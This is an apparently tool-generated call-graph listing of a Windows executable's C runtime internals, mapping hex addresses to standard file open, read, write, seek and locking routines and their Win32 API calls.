401e79 5594->5725 5596 4077b4 5598 401e66 __set_osfhnd 66 API calls 5596->5598 5600 4077b9 5598->5600 5599 401e66 __set_osfhnd 66 API calls 5603 4070f1 5599->5603 5605 401e14 __wsopen_helper 11 API calls 5600->5605 5601 4077ea 5608 407060 __tsopen_nolock 120 API calls 5601->5608 5602->5596 5602->5601 5607 401e14 __wsopen_helper 11 API calls 5603->5607 5606 4071c4 5604->5606 5614 407197 5604->5614 5615 4077c3 _doexit 5605->5615 5610 401e79 __set_osfhnd 66 API calls 5606->5610 5619 4070fb 5607->5619 5609 407804 5608->5609 5611 40782b __wsopen_helper LeaveCriticalSection 5609->5611 5612 4071c9 5610->5612 5611->5615 5613 401e66 __set_osfhnd 66 API calls 5612->5613 5616 4071d3 5613->5616 5707 406d52 5614->5707 5615->5586 5617 401e14 __wsopen_helper 11 API calls 5616->5617 5617->5619 5619->5586 5620 407255 5621 40725e 5620->5621 5622 40727f CreateFileW 5620->5622 5623 401e79 __set_osfhnd 66 API calls 5621->5623 5624 40731c GetFileType 5622->5624 5625 4072ac 5622->5625 5626 407263 5623->5626 5627 407329 GetLastError 5624->5627 5628 40736d 5624->5628 5629 4072e5 GetLastError 5625->5629 5633 4072c0 CreateFileW 5625->5633 5631 401e66 __set_osfhnd 66 API calls 5626->5631 5632 401e8c __dosmaperr 66 API calls 5627->5632 5733 406b1c 5628->5733 5728 401e8c 5629->5728 5635 40726d 5631->5635 5636 407352 CloseHandle 5632->5636 5633->5624 5633->5629 5634 40730c 5640 401e66 __set_osfhnd 66 API calls 5634->5640 5638 401e66 __set_osfhnd 66 API calls 5635->5638 5636->5634 5639 407360 5636->5639 5638->5619 5641 401e66 __set_osfhnd 66 API calls 5639->5641 5640->5642 5643 407365 5641->5643 5642->5592 5643->5634 5644 4075a2 5644->5642 5647 40770a CloseHandle CreateFileW 5644->5647 5650 407737 GetLastError 5647->5650 5651 407616 5647->5651 5649 4073f9 5649->5644 5659 4075ab 5649->5659 5662 407401 5649->5662 5670 4074fb 5649->5670 5654 401e8c __dosmaperr 66 API calls 5650->5654 5651->5642 5652 4073f4 5655 401e79 __set_osfhnd 66 API calls 5652->5655 5653 40740d 5767 4025c1 5653->5767 5658 407743 5654->5658 5655->5649 5902 406b9d 5658->5902 5659->5644 5669 4075c8 5659->5669 5675 40751f 5659->5675 5660 40743f 5665 4032f4 __lseek_nolock 68 API calls 5660->5665 5752 4089ce 5662->5752 5663 407573 5666 4025c1 __read_nolock 76 API calls 5663->5666 5664 40742c 5836 408818 5664->5836 5665->5649 5682 407580 5666->5682 5672 40464f __lseeki64_nolock 68 API calls 5669->5672 5670->5644 5670->5663 5673 40754a 5670->5673 5670->5675 5674 4075d3 5672->5674 5867 40464f 5673->5867 5674->5675 5677 4075de 5674->5677 5675->5644 5675->5662 5877 404dd1 5675->5877 5685 40464f __lseeki64_nolock 68 API calls 5677->5685 5679 407623 5681 407645 5679->5681 5683 40762a 5679->5683 5680 407609 5687 4089ce __close_nolock 69 API calls 5680->5687 5686 4032f4 __lseek_nolock 68 API calls 5681->5686 5682->5644 5682->5662 5682->5679 5682->5680 5682->5681 5688 4032f4 __lseek_nolock 68 API calls 5683->5688 5690 4075e8 5685->5690 5693 4075ed 5686->5693 5691 407610 5687->5691 5688->5693 5689 40755c 5694 40464f __lseeki64_nolock 68 API calls 5689->5694 5690->5693 5692 401e66 __set_osfhnd 66 API calls 5691->5692 5692->5651 5693->5644 5693->5662 5695 407566 5694->5695 5695->5662 5695->5663 5697 407830 5696->5697 5698 407857 5696->5698 6025 406d2b LeaveCriticalSection 5697->6025 5698->5588 5701 408bf5 5700->5701 5702 408c0a 5700->5702 5703 401e66 __set_osfhnd 66 API calls 5701->5703 5702->5593 5704 408bfa 5703->5704 5705 401e14 __wsopen_helper 11 API calls 5704->5705 5706 408c05 5705->5706 5706->5593 5708 406d5e _doexit 5707->5708 5709 4061dc __mtinitlocknum 66 API calls 5708->5709 5710 406d6e 5709->5710 5711 40629e __lock 66 API calls 5710->5711 5712 406d73 _doexit 5710->5712 5721 406d82 5711->5721 5712->5620 5713 406ec4 5924 406ee2 5713->5924 5715 406e5a 5716 4059e0 __calloc_crt 66 API calls 5715->5716 5719 406e63 5716->5719 5717 406e02 EnterCriticalSection 5720 406e12 LeaveCriticalSection 5717->5720 5717->5721 5718 40629e __lock 66 API calls 5718->5721 5719->5713 5914 406c8c 5719->5914 5720->5721 5721->5713 5721->5715 5721->5717 5721->5718 5722 406dd8 InitializeCriticalSectionAndSpinCount 5721->5722 5911 406e24 5721->5911 5722->5721 5726 404277 __getptd_noexit 66 API calls 5725->5726 5727 401e7e 5726->5727 5727->5599 5729 401e79 __set_osfhnd 66 API calls 5728->5729 5730 401e97 _free 5729->5730 5731 401e66 __set_osfhnd 66 API calls 5730->5731 5732 401eaa 5731->5732 5732->5634 5734 406b83 5733->5734 5735 406b2a 5733->5735 5736 401e66 __set_osfhnd 66 API calls 5734->5736 5735->5734 5741 406b4e 5735->5741 5737 406b88 5736->5737 5738 401e79 __set_osfhnd 66 API calls 5737->5738 5739 406b79 5738->5739 5739->5644 5739->5649 5742 4032f4 5739->5742 5740 406b73 SetStdHandle 5740->5739 5741->5739 5741->5740 5932 406c23 5742->5932 5744 403303 5745 403319 SetFilePointer 5744->5745 5746 403309 5744->5746 5748 403330 GetLastError 5745->5748 5749 403338 5745->5749 5747 401e66 __set_osfhnd 66 API calls 5746->5747 5750 40330e 5747->5750 5748->5749 5749->5750 5751 401e8c __dosmaperr 66 API calls 5749->5751 5750->5652 5750->5653 5751->5750 5753 406c23 __close_nolock 66 API calls 5752->5753 5756 4089de 5753->5756 5754 408a34 5755 406b9d __free_osfhnd 67 API calls 5754->5755 5760 408a3c 5755->5760 5756->5754 5757 408a12 5756->5757 5758 406c23 __close_nolock 66 API calls 5756->5758 5757->5754 5759 406c23 __close_nolock 66 API calls 5757->5759 5761 408a09 5758->5761 5762 408a1e CloseHandle 5759->5762 5763 408a5e 5760->5763 5766 401e8c __dosmaperr 66 API calls 5760->5766 5764 406c23 __close_nolock 66 API calls 5761->5764 5762->5754 5765 408a2a GetLastError 5762->5765 5763->5643 5764->5757 5765->5754 5766->5763 5768 4025f8 5767->5768 5769 4025dd 5767->5769 5770 402607 5768->5770 5772 402626 5768->5772 5771 401e79 __set_osfhnd 66 API calls 5769->5771 5773 401e79 __set_osfhnd 66 API calls 5770->5773 5774 4025e2 5771->5774 5776 402644 5772->5776 5787 402658 5772->5787 5775 40260c 5773->5775 5777 401e66 __set_osfhnd 66 API calls 5774->5777 5779 401e66 __set_osfhnd 66 API calls 5775->5779 5780 401e79 __set_osfhnd 66 API calls 5776->5780 5788 4025ea 5777->5788 5778 4026ae 5782 401e79 __set_osfhnd 66 API calls 5778->5782 5781 402613 5779->5781 5783 402649 5780->5783 5784 401e14 __wsopen_helper 11 API calls 5781->5784 5785 4026b3 5782->5785 5786 401e66 __set_osfhnd 66 API calls 5783->5786 5784->5788 5789 401e66 __set_osfhnd 66 API calls 5785->5789 5790 402650 5786->5790 5787->5778 5787->5788 5791 40268d 5787->5791 5793 4026c7 5787->5793 5788->5660 5788->5664 5789->5790 5792 401e14 __wsopen_helper 11 API calls 5790->5792 5791->5778 5796 402698 ReadFile 5791->5796 5792->5788 5795 40599b __malloc_crt 66 API calls 5793->5795 5797 4026dd 5795->5797 5798 4027c3 5796->5798 5799 402b3b GetLastError 5796->5799 5802 402705 5797->5802 5803 4026e7 5797->5803 5798->5799 5806 4027d7 5798->5806 5800 402b48 5799->5800 5801 4029c2 5799->5801 5804 401e66 __set_osfhnd 66 API calls 5800->5804 5810 401e8c __dosmaperr 66 API calls 5801->5810 5815 402947 5801->5815 5807 40464f __lseeki64_nolock 68 API calls 5802->5807 5805 401e66 __set_osfhnd 66 API calls 5803->5805 5808 402b4d 5804->5808 5809 4026ec 5805->5809 5806->5815 5817 4027f3 5806->5817 5819 402a07 5806->5819 5811 402713 5807->5811 5812 401e79 __set_osfhnd 66 API calls 5808->5812 5813 401e79 __set_osfhnd 66 API calls 5809->5813 5810->5815 5811->5796 5812->5815 5813->5788 5814 4012b0 _free 66 API calls 5814->5788 5815->5788 5815->5814 5816 402857 ReadFile 5822 402875 GetLastError 5816->5822 5827 40287f 5816->5827 5817->5816 5824 4028d4 5817->5824 5818 402a7c ReadFile 5820 402a9b GetLastError 5818->5820 5828 402aa5 5818->5828 5819->5815 5819->5818 5820->5819 5820->5828 5821 402998 MultiByteToWideChar 5821->5815 5823 4029bc GetLastError 5821->5823 5822->5817 5822->5827 5823->5801 5824->5815 5825 402942 5824->5825 5826 40294f 5824->5826 5832 40290c 5824->5832 5829 401e66 __set_osfhnd 66 API calls 5825->5829 5826->5832 5833 402986 5826->5833 5827->5817 5830 40464f __lseeki64_nolock 68 API calls 5827->5830 5828->5819 5831 40464f __lseeki64_nolock 68 API calls 5828->5831 5829->5815 5830->5827 5831->5828 5832->5821 5834 40464f __lseeki64_nolock 68 API calls 5833->5834 5835 402995 5834->5835 5835->5821 5837 40464f __lseeki64_nolock 68 API calls 5836->5837 5838 408837 5837->5838 5839 40889a 5838->5839 5841 40464f __lseeki64_nolock 68 API calls 5838->5841 5840 401e66 __set_osfhnd 66 API calls 5839->5840 5842 407438 5839->5842 5840->5842 5844 408853 5841->5844 5842->5660 5842->5662 5843 408935 5849 40464f __lseeki64_nolock 68 API calls 5843->5849 5862 40899e 5843->5862 5844->5839 5844->5843 5845 408879 GetProcessHeap HeapAlloc 5844->5845 5846 408895 5845->5846 5855 4088ac __setmode_nolock 5845->5855 5848 401e66 __set_osfhnd 66 API calls 5846->5848 5847 40464f __lseeki64_nolock 68 API calls 5847->5839 5848->5839 5850 40894e 5849->5850 5850->5839 5851 406c23 __close_nolock 66 API calls 5850->5851 5852 408964 SetEndOfFile 5851->5852 5854 408981 5852->5854 5852->5862 5856 401e66 __set_osfhnd 66 API calls 5854->5856 5857 408918 5855->5857 5866 4088ef __setmode_nolock 5855->5866 5945 4046d4 5855->5945 5858 408986 5856->5858 5859 401e79 __set_osfhnd 66 API calls 5857->5859 5860 401e79 __set_osfhnd 66 API calls 5858->5860 5863 40891d 5859->5863 5861 408991 GetLastError 5860->5861 5861->5862 5862->5839 5862->5847 5865 401e66 __set_osfhnd 66 API calls 5863->5865 5863->5866 5864 4088fd GetProcessHeap HeapFree 5864->5862 5865->5866 5866->5864 5868 406c23 __close_nolock 66 API calls 5867->5868 5869 40466d 5868->5869 5870 404675 5869->5870 5871 404686 SetFilePointer 5869->5871 5873 401e66 __set_osfhnd 66 API calls 5870->5873 5872 40469e GetLastError 5871->5872 5874 40467a 5871->5874 5872->5874 5875 4046a8 5872->5875 5873->5874 5874->5675 5874->5689 5876 401e8c __dosmaperr 66 API calls 5875->5876 5876->5874 5878 404ddd _doexit 5877->5878 5879 404de5 5878->5879 5883 404e00 5878->5883 5880 401e79 __set_osfhnd 66 API calls 5879->5880 5882 404dea 5880->5882 5881 404e0c 5884 401e79 __set_osfhnd 66 API calls 5881->5884 5886 401e66 __set_osfhnd 66 API calls 5882->5886 5883->5881 5885 404e46 5883->5885 5887 404e11 5884->5887 5888 406c8c ___lock_fhandle 68 API calls 5885->5888 5895 404df2 _doexit 5886->5895 5889 401e66 __set_osfhnd 66 API calls 5887->5889 5890 404e4c 5888->5890 5891 404e19 5889->5891 5892 404e5a 5890->5892 5893 404e6e 5890->5893 5894 401e14 __wsopen_helper 11 API calls 5891->5894 5896 4046d4 __write_nolock 94 API calls 5892->5896 5897 401e66 __set_osfhnd 66 API calls 5893->5897 5894->5895 5895->5675 5898 404e66 5896->5898 5899 404e73 5897->5899 6021 404e9d 5898->6021 5900 401e79 __set_osfhnd 66 API calls 5899->5900 5900->5898 5903 406c09 5902->5903 5904 406bae 5902->5904 5905 401e66 __set_osfhnd 66 API calls 5903->5905 5904->5903 5909 406bd9 5904->5909 5906 406c0e 5905->5906 5907 401e79 __set_osfhnd 66 API calls 5906->5907 5908 406bff 5907->5908 5908->5651 5909->5908 5910 406bf9 SetStdHandle 5909->5910 5910->5908 5927 4061c5 LeaveCriticalSection 5911->5927 5913 406e2b 5913->5721 5915 406c98 _doexit 5914->5915 5916 406cf2 5915->5916 5919 40629e __lock 66 API calls 5915->5919 5917 406d14 _doexit 5916->5917 5918 406cf7 EnterCriticalSection 5916->5918 5917->5713 5918->5917 5920 406cc4 5919->5920 5921 406ce0 5920->5921 5922 406ccd InitializeCriticalSectionAndSpinCount 5920->5922 5928 406d22 5921->5928 5922->5921 5931 4061c5 LeaveCriticalSection 5924->5931 5926 406ee9 5926->5712 5927->5913 5929 4061c5 _doexit LeaveCriticalSection 5928->5929 5930 406d29 5929->5930 5930->5916 5931->5926 5933 406c30 5932->5933 5934 406c48 5932->5934 5935 401e79 __set_osfhnd 66 API calls 5933->5935 5937 401e79 __set_osfhnd 66 API calls 5934->5937 5938 406c87 5934->5938 5936 406c35 5935->5936 5939 401e66 __set_osfhnd 66 API calls 5936->5939 5940 406c59 5937->5940 5938->5744 5943 406c3d 5939->5943 5941 401e66 __set_osfhnd 66 API calls 5940->5941 5942 406c61 5941->5942 5944 401e14 __wsopen_helper 11 API calls 5942->5944 5943->5744 5944->5943 5946 4046e3 __write_nolock 5945->5946 5947 404738 5946->5947 5948 404719 5946->5948 5978 40470e 5946->5978 5951 404794 5947->5951 5952 404777 5947->5952 5949 401e79 __set_osfhnd 66 API calls 5948->5949 5953 40471e 5949->5953 5950 404f4c setSBUpLow 5 API calls 5954 404dcf 5950->5954 5958 40464f __lseeki64_nolock 68 API calls 5951->5958 5962 4047a7 5951->5962 5955 401e79 __set_osfhnd 66 API calls 5952->5955 5956 401e66 __set_osfhnd 66 API calls 5953->5956 5954->5855 5957 40477c 5955->5957 5959 404725 5956->5959 5961 401e66 __set_osfhnd 66 API calls 5957->5961 5958->5962 5963 401e14 __wsopen_helper 11 API calls 5959->5963 5965 404784 5961->5965 6004 404eee 5962->6004 5963->5978 5964 4047b0 5966 404a52 5964->5966 6013 4042f0 5964->6013 5967 401e14 __wsopen_helper 11 API calls 5965->5967 5969 404a61 5966->5969 5970 404d02 WriteFile 5966->5970 5967->5978 5971 404b1c 5969->5971 5979 404a74 5969->5979 5973 404a34 5970->5973 5974 404d35 GetLastError 5970->5974 5987 404b29 5971->5987 5995 404bf6 5971->5995 5975 404d80 5973->5975 5973->5978 5982 404d53 5973->5982 5974->5973 5975->5978 5981 401e66 __set_osfhnd 66 API calls 5975->5981 5976 4047f4 5976->5966 5977 404804 GetConsoleCP 5976->5977 5977->5973 6001 404827 5977->6001 5978->5950 5979->5973 5979->5975 5980 404abe WriteFile 5979->5980 5980->5974 5980->5979 5983 404da3 5981->5983 5985 404d72 5982->5985 5986 404d5e 5982->5986 5989 401e79 __set_osfhnd 66 API calls 5983->5989 5984 404c67 WideCharToMultiByte 5984->5974 5991 404c9e WriteFile 5984->5991 5992 401e8c __dosmaperr 66 API calls 5985->5992 5990 401e66 __set_osfhnd 66 API calls 5986->5990 5987->5973 5987->5975 5988 404b98 WriteFile 5987->5988 5988->5974 5988->5987 5989->5978 5993 404d63 5990->5993 5994 404cd5 GetLastError 5991->5994 5991->5995 5992->5978 5997 401e79 __set_osfhnd 66 API calls 5993->5997 5994->5995 5995->5973 5995->5975 5995->5984 5995->5991 5997->5978 5998 405c21 78 API calls __fassign 5998->6001 5999 407b77 WriteConsoleW CreateFileW __write_nolock 5999->6001 6000 4048d3 WideCharToMultiByte 6000->5973 6002 404904 WriteFile 6000->6002 6001->5973 6001->5974 6001->5998 6001->5999 6001->6000 6003 404958 WriteFile 6001->6003 6018 405c73 6001->6018 6002->5974 6002->6001 6003->5974 6003->6001 6005 404f0a 6004->6005 6006 404efb 6004->6006 6009 404f28 6005->6009 6010 401e66 __set_osfhnd 66 API calls 6005->6010 6007 401e66 __set_osfhnd 66 API calls 6006->6007 6008 404f00 6007->6008 6008->5964 6009->5964 6011 404f1b 6010->6011 6012 401e14 __wsopen_helper 11 API calls 6011->6012 6012->6008 6014 404277 __getptd_noexit 66 API calls 6013->6014 6015 4042f8 6014->6015 6016 404305 GetConsoleMode 6015->6016 6017 40223c __amsg_exit 66 API calls 6015->6017 6016->5966 6016->5976 6017->6016 6019 405c3b __isleadbyte_l 76 API calls 6018->6019 6020 405c82 6019->6020 6020->6001 6024 406d2b LeaveCriticalSection 6021->6024 6023 404ea3 6023->5895 6024->6023 6025->5698 6027 40788e 6026->6027 6035 4078a5 6026->6035 6028 407895 6027->6028 6030 4078b6 6027->6030 6029 401e66 __set_osfhnd 66 API calls 6028->6029 6031 40789a 6029->6031 6037 401eaf 6030->6037 6033 401e14 __wsopen_helper 11 API calls 6031->6033 6033->6035 6034 408c16 78 API calls __towlower_l 6036 4078c2 6034->6036 6035->5577 6036->6034 6036->6035 6038 401ec2 6037->6038 6044 401f0f 6037->6044 6039 4042f0 __getptd 66 API calls 6038->6039 6040 401ec7 6039->6040 6041 401eef 6040->6041 6045 4058ff 6040->6045 6041->6044 6060 40517e 6041->6060 6044->6036 6046 40590b _doexit 6045->6046 6047 4042f0 __getptd 66 API calls 6046->6047 6048 405910 6047->6048 6049 40593e 6048->6049 6051 405922 6048->6051 6050 40629e __lock 66 API calls 6049->6050 6052 405945 6050->6052 6053 4042f0 __getptd 66 API calls 6051->6053 6076 4058b2 6052->6076 6057 405927 6053->6057 6058 405935 _doexit 6057->6058 6059 40223c __amsg_exit 66 API calls 6057->6059 6058->6041 6059->6058 6061 40518a _doexit 6060->6061 6062 4042f0 __getptd 66 API calls 6061->6062 6063 40518f 6062->6063 6064 40629e __lock 66 API calls 6063->6064 6072 4051a1 6063->6072 6065 4051bf 6064->6065 6066 405208 6065->6066 6067 4051f0 InterlockedIncrement 6065->6067 6068 4051d6 InterlockedDecrement 6065->6068 6132 405219 6066->6132 6067->6066 6068->6067 6071 4051e1 6068->6071 6070 40223c __amsg_exit 66 API calls 6073 4051af _doexit 6070->6073 6071->6067 6074 4012b0 _free 66 API calls 6071->6074 6072->6070 6072->6073 6073->6044 6075 4051ef 6074->6075 6075->6067 6077 4058f4 6076->6077 6078 4058bf 6076->6078 6084 40596c 6077->6084 6078->6077 6079 40563f ___addlocaleref 8 API calls 6078->6079 6080 4058d5 6079->6080 6080->6077 6087 4056ce 6080->6087 6131 4061c5 LeaveCriticalSection 6084->6131 6086 405973 6086->6057 6088 405762 6087->6088 6089 4056df InterlockedDecrement 6087->6089 6088->6077 6101 405767 6088->6101 6090 4056f4 InterlockedDecrement 6089->6090 6091 4056f7 6089->6091 6090->6091 6092 405701 InterlockedDecrement 6091->6092 6093 405704 6091->6093 6092->6093 6094 405711 6093->6094 6095 40570e InterlockedDecrement 6093->6095 6096 40571b InterlockedDecrement 6094->6096 6098 40571e 6094->6098 6095->6094 6096->6098 6097 405737 InterlockedDecrement 6097->6098 6098->6097 6099 405747 InterlockedDecrement 6098->6099 6100 405752 InterlockedDecrement 6098->6100 6099->6098 6100->6088 6102 4057eb 6101->6102 6109 40577e 6101->6109 6103 405838 6102->6103 6104 4012b0 _free 66 API calls 6102->6104 6105 408065 ___free_lc_time 66 API calls 6103->6105 6123 405861 6103->6123 6107 40580c 6104->6107 6108 405856 6105->6108 6106 4057b2 6110 4057d3 6106->6110 6120 4012b0 _free 66 API calls 6106->6120 6111 4012b0 _free 66 API calls 6107->6111 6112 4012b0 _free 66 API calls 6108->6112 6109->6102 6109->6106 6113 4012b0 _free 66 API calls 6109->6113 6116 4012b0 _free 66 API calls 6110->6116 6115 40581f 6111->6115 6112->6123 6118 4057a7 6113->6118 6114 4058a6 6119 4012b0 _free 66 API calls 6114->6119 6121 4012b0 _free 66 API calls 6115->6121 6117 4057e0 6116->6117 6124 4012b0 _free 66 API calls 6117->6124 6125 408445 ___free_lconv_mon 66 API calls 6118->6125 6126 4058ac 6119->6126 6127 4057c8 6120->6127 6128 40582d 6121->6128 6122 4012b0 66 API calls _free 6122->6123 6123->6114 6123->6122 6124->6102 6125->6106 6126->6077 6129 4083dc ___free_lconv_num 66 API calls 6127->6129 6130 4012b0 _free 66 API calls 6128->6130 6129->6110 6130->6103 6131->6086 6135 4061c5 LeaveCriticalSection 6132->6135 6134 405220 6134->6072 6135->6134 6137 402e7d LeaveCriticalSection 6136->6137 6138 402e5e 6136->6138 6137->5551 6138->6137 6139 402e65 6138->6139 6142 4061c5 LeaveCriticalSection 6139->6142 6141 402e7a 6141->5551 6142->6141 6144 402dec 6143->6144 6145 402e0e EnterCriticalSection 6143->6145 6144->6145 6146 402df4 6144->6146 6147 40195b 6145->6147 6148 40629e __lock 66 API calls 6146->6148 6149 40188b 6147->6149 6148->6147 6150 4018ab 6149->6150 6151 40189b 6149->6151 6153 4018bd 6150->6153 6202 401692 6150->6202 6152 401e66 __set_osfhnd 66 API calls 6151->6152 6160 4018a0 6152->6160 6164 40343d 6153->6164 6158 4018fd 6177 403369 6158->6177 6161 401987 6160->6161 6162 402e4d _fseek 2 API calls 6161->6162 6163 40198f 6162->6163 6163->5474 6165 403456 6164->6165 6169 4018cb 6164->6169 6166 402c6e __fclose_nolock 66 API calls 6165->6166 6165->6169 6167 403471 6166->6167 6168 404dd1 __write 97 API calls 6167->6168 6168->6169 6170 402c6e 6169->6170 6171 402c7a 6170->6171 6172 402c8f 6170->6172 6173 401e66 __set_osfhnd 66 API calls 6171->6173 6172->6158 6174 402c7f 6173->6174 6175 401e14 __wsopen_helper 11 API calls 6174->6175 6176 402c8a 6175->6176 6176->6158 6178 403375 _doexit 6177->6178 6179 403398 6178->6179 6180 40337d 6178->6180 6181 4033a4 6179->6181 6186 4033de 6179->6186 6182 401e79 __set_osfhnd 66 API calls 6180->6182 6183 401e79 __set_osfhnd 66 API calls 6181->6183 6184 403382 6182->6184 6185 4033a9 6183->6185 6187 401e66 __set_osfhnd 66 API calls 6184->6187 6188 401e66 __set_osfhnd 66 API calls 6185->6188 6189 406c8c ___lock_fhandle 68 API calls 6186->6189 6196 40338a _doexit 6187->6196 6190 4033b1 6188->6190 6191 4033e4 6189->6191 6192 401e14 __wsopen_helper 11 API calls 6190->6192 6193 4033f2 6191->6193 6194 403406 6191->6194 6192->6196 6197 4032f4 __lseek_nolock 68 API calls 6193->6197 6195 401e66 __set_osfhnd 66 API calls 6194->6195 6198 40340b 6195->6198 6196->6160 6199 4033fe 6197->6199 6200 401e79 __set_osfhnd 66 API calls 6198->6200 6219 403435 6199->6219 6200->6199 6203 4016a5 6202->6203 6204 4016bd 6202->6204 6206 401e66 __set_osfhnd 66 API calls 6203->6206 6205 402c6e __fclose_nolock 66 API calls 6204->6205 6207 4016c4 6205->6207 6208 4016aa 6206->6208 6210 403369 __write 71 API calls 6207->6210 6209 401e14 __wsopen_helper 11 API calls 6208->6209 6218 4016b5 6209->6218 6211 4016db 6210->6211 6212 40174d 6211->6212 6214 40170d 6211->6214 6211->6218 6213 401e66 __set_osfhnd 66 API calls 6212->6213 6213->6218 6215 403369 __write 71 API calls 6214->6215 6214->6218 6216 4017a8 6215->6216 6217 403369 __write 71 API calls 6216->6217 6216->6218 6217->6218 6218->6153 6222 406d2b LeaveCriticalSection 6219->6222 6221 40343b 6221->6196 6222->6221 6224 402e4d _fseek 2 API calls 6223->6224 6225 401889 6224->6225 6225->5489 6227 4015f3 _doexit 6226->6227 6228 401634 6227->6228 6229 401607 _memset 6227->6229 6230 40162c _doexit 6227->6230 6231 402dda __lock_file 67 API calls 6228->6231 6232 401e66 __set_osfhnd 66 API calls 6229->6232 6230->5492 6233 40163c 6231->6233 6234 401621 6232->6234 6239 40142b 6233->6239 6237 401e14 __wsopen_helper 11 API calls 6234->6237 6237->6230 6240 401463 6239->6240 6243 401449 _memset 6239->6243 6253 40166b 6240->6253 6241 401453 6242 401e66 __set_osfhnd 66 API calls 6241->6242 6252 401458 6242->6252 6243->6240 6243->6241 6247 40149e 6243->6247 6244 401e14 __wsopen_helper 11 API calls 6244->6240 6246 4015a9 _memset 6250 401e66 __set_osfhnd 66 API calls 6246->6250 6247->6240 6247->6246 6248 402c6e __fclose_nolock 66 API calls 6247->6248 6256 402b78 6247->6256 6286 40249f 6247->6286 6306 402c94 6247->6306 6248->6247 6250->6252 6252->6244 6254 402e4d _fseek 2 API calls 6253->6254 6255 401673 6254->6255 6255->6230 6257 402b84 _doexit 6256->6257 6258 402ba7 6257->6258 6259 402b8c 6257->6259 6261 402bb3 6258->6261 6264 402bed 6258->6264 6260 401e79 __set_osfhnd 66 API calls 6259->6260 6262 402b91 6260->6262 6263 401e79 __set_osfhnd 66 API calls 6261->6263 6265 401e66 __set_osfhnd 66 API calls 6262->6265 6266 402bb8 6263->6266 6267 402bfa 6264->6267 6268 402c0f 6264->6268 6273 402b99 _doexit 6265->6273 6269 401e66 __set_osfhnd 66 API calls 6266->6269 6270 401e79 __set_osfhnd 66 API calls 6267->6270 6271 406c8c ___lock_fhandle 68 API calls 6268->6271 6275 402bc0 6269->6275 6272 402bff 6270->6272 6274 402c15 6271->6274 6276 401e66 __set_osfhnd 66 API calls 6272->6276 6273->6247 6277 402c23 6274->6277 6278 402c37 6274->6278 6279 401e14 __wsopen_helper 11 API calls 6275->6279 6276->6275 6280 4025c1 __read_nolock 76 API calls 6277->6280 6281 401e66 __set_osfhnd 66 API calls 6278->6281 6279->6273 6282 402c2f 6280->6282 6283 402c3c 6281->6283 6315 402c66 6282->6315 6284 401e79 __set_osfhnd 66 API calls 6283->6284 6284->6282 6287 4024c1 6286->6287 6288 4024ac 6286->6288 6292 4024f6 6287->6292 6298 4024bc 6287->6298 6319 404ea5 6287->6319 6289 401e66 __set_osfhnd 66 API calls 6288->6289 6290 4024b1 6289->6290 6291 401e14 __wsopen_helper 11 API calls 6290->6291 6291->6298 6294 402c6e __fclose_nolock 66 API calls 6292->6294 6295 40250a 6294->6295 6296 402b78 __read 79 API calls 6295->6296 6297 402511 6296->6297 6297->6298 6299 402c6e __fclose_nolock 66 API calls 6297->6299 6298->6247 6300 402534 6299->6300 6300->6298 6301 402c6e __fclose_nolock 66 API calls 6300->6301 6302 402540 6301->6302 6302->6298 6303 402c6e __fclose_nolock 66 API calls 6302->6303 6304 40254d 6303->6304 6305 402c6e __fclose_nolock 66 API calls 6304->6305 6305->6298 6309 402ca5 _memset 6306->6309 6311 402ca1 _memmove 6306->6311 6307 402cab 6308 401e66 __set_osfhnd 66 API calls 6307->6308 6310 402cb0 6308->6310 6309->6307 6309->6311 6312 402cf0 6309->6312 6313 401e14 __wsopen_helper 11 API calls 6310->6313 6311->6247 6312->6311 6314 401e66 __set_osfhnd 66 API calls 6312->6314 6313->6311 6314->6310 6318 406d2b LeaveCriticalSection 6315->6318 6317 402c6c 6317->6273 6318->6317 6320 40599b __malloc_crt 66 API calls 6319->6320 6321 404eba 6320->6321 6321->6292 6325 4020b2 6322->6325 6324 402219 6326 4020be _doexit 6325->6326 6327 40629e __lock 61 API calls 6326->6327 6328 4020c5 6327->6328 6330 4020f0 DecodePointer 6328->6330 6333 40216f 6328->6333 6332 402107 DecodePointer 6330->6332 6330->6333 6338 40211a 6332->6338 6348 4021dd 6333->6348 6335 4021ec _doexit 6335->6324 6336 4021d4 6339 401f9a _doexit 3 API calls 6336->6339 6338->6333 6341 402131 DecodePointer 6338->6341 6345 402140 DecodePointer DecodePointer 6338->6345 6346 404140 RtlEncodePointer 6338->6346 6340 4021dd 6339->6340 6342 4021ea 6340->6342 6353 4061c5 LeaveCriticalSection 6340->6353 6347 404140 RtlEncodePointer 6341->6347 6342->6324 6345->6338 6346->6338 6347->6338 6349 4021e3 6348->6349 6350 4021bd 6348->6350 6354 4061c5 LeaveCriticalSection 6349->6354 6350->6335 6352 4061c5 LeaveCriticalSection 6350->6352 6352->6336 6353->6342 6354->6350 6597 4065f4 6598 4059e0 __calloc_crt 66 API calls 6597->6598 6599 406600 EncodePointer 6598->6599 6600 406619 6599->6600 6533 408cd5 6534 408ceb 6533->6534 6535 408cdf 6533->6535 6535->6534 6536 408ce4 CloseHandle 6535->6536 6536->6534 6601 4062f5 6602 4062f8 6601->6602 6603 4086d1 _abort 68 API calls 6602->6603 6604 406304 _doexit 6603->6604 6537 401c56 6538 401c65 6537->6538 6539 401c6b 6537->6539 6540 402208 __amsg_exit 66 API calls 6538->6540 6543 40222d 6539->6543 6540->6539 6542 401c70 _doexit 6544 4020b2 _doexit 66 API calls 6543->6544 6545 402238 6544->6545 6545->6542 6804 402dba 6811 4035c7 6804->6811 6807 402dcd 6809 4012b0 _free 66 API calls 6807->6809 6810 402dd8 6809->6810 6824 4034ed 6811->6824 6813 402dbf 6813->6807 6814 406eeb 6813->6814 6815 406ef7 _doexit 6814->6815 6816 40629e __lock 66 API calls 6815->6816 6823 406f03 6816->6823 6817 406f69 6854 406f7e 6817->6854 6819 406f75 _doexit 6819->6807 6821 406f3e DeleteCriticalSection 6822 4012b0 _free 66 API calls 6821->6822 6822->6823 6823->6817 6823->6821 6841 4087a4 6823->6841 6825 4034f9 _doexit 6824->6825 6826 40629e __lock 66 API calls 6825->6826 6832 403508 6826->6832 6827 4035a0 6837 4035be 6827->6837 6829 402e1b __getstream 67 API calls 6829->6832 6830 4035ac _doexit 6830->6813 6832->6827 6832->6829 6833 4034a5 101 API calls __fflush_nolock 6832->6833 6834 40358f 6832->6834 6833->6832 6835 402e89 __getstream 2 API calls 6834->6835 6836 40359d 6835->6836 6836->6832 6840 4061c5 LeaveCriticalSection 6837->6840 6839 4035c5 6839->6830 6840->6839 6842 4087b0 _doexit 6841->6842 6843 4087c2 6842->6843 6844 4087d7 6842->6844 6845 401e66 __set_osfhnd 66 API calls 6843->6845 6846 402dda __lock_file 67 API calls 6844->6846 6850 4087d2 _doexit 6844->6850 